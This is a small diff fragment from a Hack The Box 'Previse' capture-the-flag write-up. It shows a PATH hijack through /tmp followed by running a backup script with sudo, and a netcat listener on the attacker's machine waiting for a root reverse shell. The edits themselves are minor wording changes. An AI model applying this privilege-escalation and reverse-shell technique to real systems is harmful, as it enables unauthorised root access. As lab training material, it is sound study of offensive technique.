joelczk/writeups/HTB/Previse.md

 /tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
 m4lwhere@previse:/tmp$ sudo /opt/scripts/access_backup.sh
 ```

+### Obtaining root flag
-We will receive the connection on the attacker's machine and we will be able to obtain the system flag
+We will then receive the connection on the attacker's machine and we will be able to obtain the system flag
 ```
 ┌──(kali㉿kali)-[~/Desktop]
 └─$ nc -nlvp 3000                                                       24 ⚙